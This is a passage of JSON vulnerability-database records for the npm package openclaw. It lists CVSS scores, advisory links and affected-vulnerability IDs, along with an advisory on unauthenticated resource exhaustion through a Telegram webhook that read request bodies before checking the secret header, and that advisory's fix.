/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/commit/3834d47099dd13c8244ed6de8b9ea9855c553623"},{"reference_url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":"
"}],"url":"https://github.com/openclaw/openclaw/releases/tag/v2026.3.31"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-p464-m8x6-vhv8"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41405","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-41405"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-ms-teams-webhook-body-parsing"},{"reference_url":"https://github.com/advisories/GHSA-p464-m8x6-vhv8","reference_id":"GHSA-p464-m8x6-vhv8","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"ur
l":"https://github.com/advisories/GHSA-p464-m8x6-vhv8"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/109907?format=json","purl":"pkg:npm/openclaw@2026.3.31","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"v
ulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kxmf-d7w1-xfcv"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pj41-sunw-vbcj"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vfbb-bpy9-87ey"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"v
ulnerability":"VCID-zpte-tgt5-wqcm"},{"vulnerability":"VCID-zu4s-jnn3-1kd8"},{"vulnerability":"VCID-zunq-wnnf-k3fw"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31"}],"aliases":["CVE-2026-41405","GHSA-p464-m8x6-vhv8"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-t991-75e7-ykdv"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/91290?format=json","vulnerability_id":"VCID-tdjc-vav8-97cf","summary":"OpenClaw Telegram webhook request bodies were read before secret validation, enabling unauthenticated resource exhaustion\n### Summary\n`openclaw` versions `<= 2026.3.12` read and buffered Telegram webhook request bodies before validating `x-telegram-bot-api-secret-token`. This let unauthenticated callers force up to the configured webhook body limit of pre-auth body I/O and JSON parse work per request.\n\n### Affected Packages / Versions\n- Package: `openclaw` (`npm`)\n- Affected versions: `<= 2026.3.12`\n- Fixed version: `2026.3.13`\n\n### Details\nThe vulnerable path was the standalone Telegram webhook listener in `src/telegram/webhook.ts`. In affected releases, the request handler accepted `POST` requests, called `readJsonBodyWithLimit(...)`, and only then checked the Telegram secret header. Because the secret validation happened after body reading, an unauthenticated caller could make the server spend memory, socket time, and JSON parse work on requests that should have been rejected before any body processing.\n\nThis issue is in scope under OpenClaw's trust model because the Telegram webhook endpoint accepts untrusted network traffic and the secret header is the authentication boundary for that ingress path.\n\n### Fix\n`openclaw@2026.3.13` validates the Telegram webhook secret before any body I/O. 
Current code reads the header, rejects invalid requests immediately with `401`, and only calls `readJsonBodyWithLimit(...)` after `hasValidTelegramWebhookSecret(...)` succeeds.\n\nRegression coverage exists in `src/telegram/webhook.test.ts` (`rejects unauthenticated requests before reading the request body`).\n\n### Fix Commit(s)\n- `7e49e98f79073b11134beac27fdff547ba5a4a02`\n\nThanks @space08 for reporting.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32980","reference_id":"","reference_type":"","scores":[{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12887","published_at":"2026-06-05T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.12851","published_at":"2026-06-07T12:55:00Z"},{"value":"0.00041","scoring_system":"epss","scoring_elements":"0.1289","published_at":"2026-06-06T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-32980"},{"reference_url":"https://github.com/openclaw/openclaw","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/openclaw/openclaw"},{"reference_url":"https://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T16:02:47Z/"}],"url":"htt
ps://github.com/openclaw/openclaw/commit/7e49e98f79073b11134beac27fdff547ba5a4a02"},{"reference_url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T16:02:47Z/"}],"url":"https://github.com/openclaw/openclaw/security/advisories/GHSA-jq3f-vjww-8rq7"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-32980"},{"reference_url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticated-telegram-webhook-request","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H"},{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-30T16:02:47Z/"}],"url":"https://www.vulncheck.com/advisories/openclaw-resource-exhaustion-via-unauthenticat
ed-telegram-webhook-request"},{"reference_url":"https://github.com/advisories/GHSA-jq3f-vjww-8rq7","reference_id":"GHSA-jq3f-vjww-8rq7","reference_type":"","scores":[{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-jq3f-vjww-8rq7"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/113139?format=json","purl":"pkg:npm/openclaw@2026.3.13","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-11dg-bvft-6kb1"},{"vulnerability":"VCID-1728-wc17-dud6"},{"vulnerability":"VCID-1j3m-fecr-f7cn"},{"vulnerability":"VCID-1kk2-t48u-zkb2"},{"vulnerability":"VCID-1p3b-pfnn-x7ad"},{"vulnerability":"VCID-1p5p-eth5-3ufu"},{"vulnerability":"VCID-1pbz-8rnx-dkhe"},{"vulnerability":"VCID-1smq-mbty-jkaj"},{"vulnerability":"VCID-1ufd-uuqk-nbdv"},{"vulnerability":"VCID-24eb-5jt8-aueq"},{"vulnerability":"VCID-24m7-jx1g-hqde"},{"vulnerability":"VCID-258k-a4dw-tfae"},{"vulnerability":"VCID-26kp-dbu2-pqej"},{"vulnerability":"VCID-26sg-e29u-hkf3"},{"vulnerability":"VCID-26sv-grsd-abcw"},{"vulnerability":"VCID-294z-6z8j-97bx"},{"vulnerability":"VCID-29a1-7ar7-67e1"},{"vulnerability":"VCID-2c8p-gbaw-3ye4"},{"vulnerability":"VCID-2h6a-becf-x7ej"},{"vulnerability":"VCID-2hca-3v8f-f3e8"},{"vulnerability":"VCID-2khh-wv8p-97ff"},{"vulnerability":"VCID-2mxq-krq5-bycx"},{"vulnerability":"VCID-2uqu-k42d-1baq"},{"vulnerability":"VCID-2v8n-mnws-jfc9"},{"vulnerability":"VCID-2wr9-h42m-a7ev"},{"vulnerability":"VCID-32zs-2zs9-uufs"},{"vulnerability":"VCID-356u-h788-pkgt"},{"vulnerability":"VCID-37ep-9smd-zuh9"},{"vulnerability":"VCID-384t-z1h8-pfft"},{"vulnerability":"VCID-38g8-39ek-xbat"},{"vulnerability":"VCID-3bdd-a9nw-13bn"},{"vulnerability":"VCID-3pqp-bneb-mbc4"},{"vulnerability":"VCID-3wsw-d4z2-dydt"},{"vulnerability":"VCID-3xeb-phgc-vkcg"},{"vulnerability":"VCID-3xmj-n798-x3cw"},{"vulnerability":"VCID-3zwq-dz2u-pqgv"},{"vulnerability":"VCID-3zx4-t8cj-kbfn"},{"vulnerability":"VCID-4316-7q9a-xuhx"},{"v
ulnerability":"VCID-4hz5-f2pw-3yb4"},{"vulnerability":"VCID-4jwj-6s5z-wbeq"},{"vulnerability":"VCID-4nwq-14y4-xkhp"},{"vulnerability":"VCID-4u3z-rs45-gbhe"},{"vulnerability":"VCID-4uqc-3h1c-4yhs"},{"vulnerability":"VCID-4urc-4536-pqhk"},{"vulnerability":"VCID-5atj-2a7b-57g5"},{"vulnerability":"VCID-5rgx-2krs-guck"},{"vulnerability":"VCID-5s6h-u8x6-myfk"},{"vulnerability":"VCID-6849-th74-yqd5"},{"vulnerability":"VCID-6bxd-kbse-sudx"},{"vulnerability":"VCID-6rha-8r5p-jyb7"},{"vulnerability":"VCID-6wth-qthz-yud8"},{"vulnerability":"VCID-6y5w-am4s-6qa5"},{"vulnerability":"VCID-733f-57ds-xugm"},{"vulnerability":"VCID-73cz-n29z-uqem"},{"vulnerability":"VCID-75yr-sbce-nkah"},{"vulnerability":"VCID-7akj-469t-57hz"},{"vulnerability":"VCID-7dyw-9b37-yqh4"},{"vulnerability":"VCID-7gju-19nh-7bgu"},{"vulnerability":"VCID-7ntr-5dr5-9uf8"},{"vulnerability":"VCID-7snr-fn3u-x3b8"},{"vulnerability":"VCID-7wmr-v7zb-6fc9"},{"vulnerability":"VCID-7z2s-k6ty-ekg1"},{"vulnerability":"VCID-816s-45wb-83ce"},{"vulnerability":"VCID-849r-t5j1-vue8"},{"vulnerability":"VCID-84v2-s1yq-rkfr"},{"vulnerability":"VCID-8aek-6dw1-tudj"},{"vulnerability":"VCID-8uzb-xmf8-hbca"},{"vulnerability":"VCID-8z7r-a8dv-eueb"},{"vulnerability":"VCID-96jd-x87b-s3ey"},{"vulnerability":"VCID-9hcd-uj62-8yeu"},{"vulnerability":"VCID-9jjv-aa8k-rke1"},{"vulnerability":"VCID-9kgh-wj9w-ykff"},{"vulnerability":"VCID-9pj9-7b12-jbea"},{"vulnerability":"VCID-9uyu-y9qv-u7e1"},{"vulnerability":"VCID-9v6f-dbmk-jygq"},{"vulnerability":"VCID-9xgq-vtg2-jucq"},{"vulnerability":"VCID-9xrt-mv81-3yc8"},{"vulnerability":"VCID-9yxw-fj1c-tff9"},{"vulnerability":"VCID-a2p8-ydn6-3bbr"},{"vulnerability":"VCID-a2wx-7b8h-c3h1"},{"vulnerability":"VCID-a46u-tnbh-fyhs"},{"vulnerability":"VCID-a4jz-y9s4-zkfg"},{"vulnerability":"VCID-ad1h-m5fz-f3hu"},{"vulnerability":"VCID-aja9-wzp2-kbcj"},{"vulnerability":"VCID-arks-g6hw-abbw"},{"vulnerability":"VCID-asuy-amja-eyd4"},{"vulnerability":"VCID-atn7-pn13-3fgb"},{"vulnerability":"VCID-axp9-mt9z-gkgw"},{"v
ulnerability":"VCID-aye6-1fwu-nkc5"},{"vulnerability":"VCID-b9w3-w2nq-cqg6"},{"vulnerability":"VCID-bg1d-gmxy-wkc6"},{"vulnerability":"VCID-bgwh-spue-yybk"},{"vulnerability":"VCID-bk76-1ctt-tkaw"},{"vulnerability":"VCID-bkya-73v8-bber"},{"vulnerability":"VCID-bnfh-rsk9-cfea"},{"vulnerability":"VCID-brfj-4shr-qkgc"},{"vulnerability":"VCID-bumq-54sb-6ua7"},{"vulnerability":"VCID-bzw7-yvu2-yqa2"},{"vulnerability":"VCID-c25h-khws-2fc3"},{"vulnerability":"VCID-c4yt-z48z-zygv"},{"vulnerability":"VCID-c76v-4577-n7c6"},{"vulnerability":"VCID-carm-gpgh-wbbf"},{"vulnerability":"VCID-cbuu-4d6c-rben"},{"vulnerability":"VCID-cjjd-hv92-wbfn"},{"vulnerability":"VCID-csnc-r6fv-j3en"},{"vulnerability":"VCID-cvmw-sxfq-dyhz"},{"vulnerability":"VCID-cvxu-rdbu-abd2"},{"vulnerability":"VCID-cwd3-ecym-sfaw"},{"vulnerability":"VCID-cyj6-zyuh-qug6"},{"vulnerability":"VCID-d3qp-5wm9-aqfp"},{"vulnerability":"VCID-d864-qy75-c3dx"},{"vulnerability":"VCID-d8v2-gft5-buee"},{"vulnerability":"VCID-da47-zdf1-mfgf"},{"vulnerability":"VCID-dbcw-brhj-k7hs"},{"vulnerability":"VCID-ddf9-tnrt-r7f2"},{"vulnerability":"VCID-dfdk-dhwf-9yaj"},{"vulnerability":"VCID-djqx-bwuu-4uc1"},{"vulnerability":"VCID-dmse-bb22-rkcj"},{"vulnerability":"VCID-dv5s-pvw1-a7fu"},{"vulnerability":"VCID-e25p-j5ed-yqfz"},{"vulnerability":"VCID-e4ac-qm17-qbf5"},{"vulnerability":"VCID-eaaf-8rfa-f3hz"},{"vulnerability":"VCID-eda1-pnhb-bqes"},{"vulnerability":"VCID-em6w-a7mj-mqa4"},{"vulnerability":"VCID-fekn-d6f3-xfa6"},{"vulnerability":"VCID-fuda-zxu8-gbb4"},{"vulnerability":"VCID-g3hg-peh1-tudm"},{"vulnerability":"VCID-g8r6-x6s5-uydq"},{"vulnerability":"VCID-gk95-28x9-17dk"},{"vulnerability":"VCID-gkyv-ahk7-1ud3"},{"vulnerability":"VCID-gvam-2net-8kc5"},{"vulnerability":"VCID-h8vg-ewrr-tfec"},{"vulnerability":"VCID-h9g5-xe4k-6udx"},{"vulnerability":"VCID-haxd-ps1x-h3ch"},{"vulnerability":"VCID-hd4w-s3dp-nubj"},{"vulnerability":"VCID-hkqd-6khg-m3hj"},{"vulnerability":"VCID-hz33-9efv-c7ef"},{"vulnerability":"VCID-j8fb-fhyc-33fu"},{"v
ulnerability":"VCID-j92n-5217-9bhj"},{"vulnerability":"VCID-j96c-kau3-7fag"},{"vulnerability":"VCID-jbwa-scg3-efeq"},{"vulnerability":"VCID-jdqk-kv8u-xqa9"},{"vulnerability":"VCID-jhah-j2td-t3dp"},{"vulnerability":"VCID-jshg-1pb2-wbak"},{"vulnerability":"VCID-jtxm-z4vv-cqg7"},{"vulnerability":"VCID-k3up-1vdf-2uh9"},{"vulnerability":"VCID-k52b-966p-ybbk"},{"vulnerability":"VCID-k5da-7tht-w3bs"},{"vulnerability":"VCID-k8s8-zjv4-gqdb"},{"vulnerability":"VCID-kcy2-a98b-uyg7"},{"vulnerability":"VCID-kh1q-871c-zkfa"},{"vulnerability":"VCID-kzgh-7f6h-kfd1"},{"vulnerability":"VCID-ma62-gtan-97au"},{"vulnerability":"VCID-mcz5-wgu1-z7g7"},{"vulnerability":"VCID-mggy-bv5s-5uax"},{"vulnerability":"VCID-mqzw-sq85-9ba2"},{"vulnerability":"VCID-mszk-dr24-xugw"},{"vulnerability":"VCID-mv8b-cryt-u3g8"},{"vulnerability":"VCID-mxu5-yjqs-nuap"},{"vulnerability":"VCID-nf6w-v1pc-mbe5"},{"vulnerability":"VCID-nfva-pukn-uqch"},{"vulnerability":"VCID-nkh4-j2pe-1qhr"},{"vulnerability":"VCID-ns77-4wfj-9ka6"},{"vulnerability":"VCID-nszj-2u6y-xqcb"},{"vulnerability":"VCID-ntwt-jkgr-sffu"},{"vulnerability":"VCID-nv6g-7gs9-pfan"},{"vulnerability":"VCID-nw4r-wjgs-8qc1"},{"vulnerability":"VCID-p7gx-9usz-yyew"},{"vulnerability":"VCID-p7me-4bzz-83cm"},{"vulnerability":"VCID-p7v5-jqhq-nbhz"},{"vulnerability":"VCID-p8xd-2um4-9ufr"},{"vulnerability":"VCID-pa1f-qzsh-efa9"},{"vulnerability":"VCID-pae5-uyu7-k3c1"},{"vulnerability":"VCID-pc9z-x5wk-8ue7"},{"vulnerability":"VCID-pdgz-5fu2-g7af"},{"vulnerability":"VCID-pdmd-a4fg-8fcg"},{"vulnerability":"VCID-pgdr-mvc3-2kg3"},{"vulnerability":"VCID-psms-gauf-tkbz"},{"vulnerability":"VCID-q6ne-sw1r-xkd1"},{"vulnerability":"VCID-q9jf-srt4-fbcg"},{"vulnerability":"VCID-qedr-a3ay-v3gx"},{"vulnerability":"VCID-qjss-tvgk-3ubk"},{"vulnerability":"VCID-qjvc-etb4-qbfv"},{"vulnerability":"VCID-qquc-rw1d-m7ec"},{"vulnerability":"VCID-r5bw-c2py-9udf"},{"vulnerability":"VCID-r5dj-qv5d-sqff"},{"vulnerability":"VCID-r9j7-ya3h-cbda"},{"vulnerability":"VCID-r9y1-z2ax-z3e2"},{"v
ulnerability":"VCID-rf6b-q7cj-jbgc"},{"vulnerability":"VCID-rkx2-eq2x-q7d1"},{"vulnerability":"VCID-rr6t-1193-ybgz"},{"vulnerability":"VCID-rswr-nd6z-vuhe"},{"vulnerability":"VCID-ry1r-br3q-2uaw"},{"vulnerability":"VCID-s3wz-3yzf-ybhz"},{"vulnerability":"VCID-s4s8-8qea-q3fd"},{"vulnerability":"VCID-sddn-scg8-kqab"},{"vulnerability":"VCID-sja9-6t41-hud8"},{"vulnerability":"VCID-sw3m-5ryw-jbdh"},{"vulnerability":"VCID-t2ve-xemk-mqa9"},{"vulnerability":"VCID-t2yy-9ume-t7be"},{"vulnerability":"VCID-t8e5-163r-37hc"},{"vulnerability":"VCID-t991-75e7-ykdv"},{"vulnerability":"VCID-te8f-snty-j7hh"},{"vulnerability":"VCID-tf28-1z2z-5yfn"},{"vulnerability":"VCID-tk9h-nqrz-uugp"},{"vulnerability":"VCID-tqzy-84fm-z7b6"},{"vulnerability":"VCID-twsq-vfde-4fbf"},{"vulnerability":"VCID-u1ru-vdfp-x3hu"},{"vulnerability":"VCID-u6hw-ffpj-4yd9"},{"vulnerability":"VCID-u9cw-crg5-1kbs"},{"vulnerability":"VCID-una1-gxkk-t3bp"},{"vulnerability":"VCID-uy97-p1ex-y7df"},{"vulnerability":"VCID-v1bp-hw9a-yffz"},{"vulnerability":"VCID-v91b-1nmx-ckcx"},{"vulnerability":"VCID-v9cd-65tf-p3f8"},{"vulnerability":"VCID-vktg-77tu-vycv"},{"vulnerability":"VCID-vm8g-hrvu-quhm"},{"vulnerability":"VCID-vqrj-z6tx-rff2"},{"vulnerability":"VCID-vtqt-bgz7-yub6"},{"vulnerability":"VCID-vx5d-3d98-7kf3"},{"vulnerability":"VCID-vy8v-np82-r3b5"},{"vulnerability":"VCID-vz7k-r7c4-ebfg"},{"vulnerability":"VCID-w2rd-2j4p-gfgw"},{"vulnerability":"VCID-w2tj-nqa6-cuam"},{"vulnerability":"VCID-w4p1-sxdg-hyha"},{"vulnerability":"VCID-w58d-6veg-uugy"},{"vulnerability":"VCID-watb-49vx-yub1"},{"vulnerability":"VCID-wfkm-7ayk-uuhb"},{"vulnerability":"VCID-wkye-je9r-1fba"},{"vulnerability":"VCID-wmr3-83u3-6qdb"},{"vulnerability":"VCID-wut7-y72y-9ucb"},{"vulnerability":"VCID-wwcu-de9t-d3ca"},{"vulnerability":"VCID-wyce-qxau-mqff"},{"vulnerability":"VCID-x2ru-ydpv-f3ah"},{"vulnerability":"VCID-x4hn-ygbg-mkep"},{"vulnerability":"VCID-x794-wfnf-1ugf"},{"vulnerability":"VCID-x7uw-s9a6-fybd"},{"vulnerability":"VCID-x9qg-8qk5-s3d6"},{"v
ulnerability":"VCID-xfgw-ua7r-abbr"},{"vulnerability":"VCID-xj73-kszs-yygp"},{"vulnerability":"VCID-xnvm-rp36-vyaj"},{"vulnerability":"VCID-xpr3-hg3h-z3bz"},{"vulnerability":"VCID-xryt-a83q-q7et"},{"vulnerability":"VCID-xsct-xjs7-nbab"},{"vulnerability":"VCID-xux6-be95-e7ec"},{"vulnerability":"VCID-xvhd-w4tv-tqhr"},{"vulnerability":"VCID-xyck-sspa-4ba2"},{"vulnerability":"VCID-xz8s-hj5s-wfgj"},{"vulnerability":"VCID-xzg5-ren5-p7gw"},{"vulnerability":"VCID-y65g-4baa-a7c2"},{"vulnerability":"VCID-y7sd-j9xn-qffs"},{"vulnerability":"VCID-ye4t-n6r3-67ab"},{"vulnerability":"VCID-yhpq-5qy3-y7bn"},{"vulnerability":"VCID-ykwt-tdpa-3bft"},{"vulnerability":"VCID-ymmv-2qmq-6kap"},{"vulnerability":"VCID-ynup-4v9e-tbh4"},{"vulnerability":"VCID-yp2w-pc58-9bf6"},{"vulnerability":"VCID-ywrn-52gx-f3ad"},{"vulnerability":"VCID-z3rc-xpx7-fkcu"},{"vulnerability":"VCID-z7wa-tw2t-vqas"},{"vulnerability":"VCID-z8mj-pnbe-wqej"},{"vulnerability":"VCID-zac2-wjyt-27af"},{"vulnerability":"VCID-zb5t-hhkm-kfeh"},{"vulnerability":"VCID-zf3q-78js-k7ce"},{"vulnerability":"VCID-zg68-u5b5-vkft"},{"vulnerability":"VCID-zhpy-h2b2-ekd8"},{"vulnerability":"VCID-zkum-rn42-yyfs"},{"vulnerability":"VCID-zpb1-e3g9-vkbh"},{"vulnerability":"VCID-zpte-tgt5-wqcm"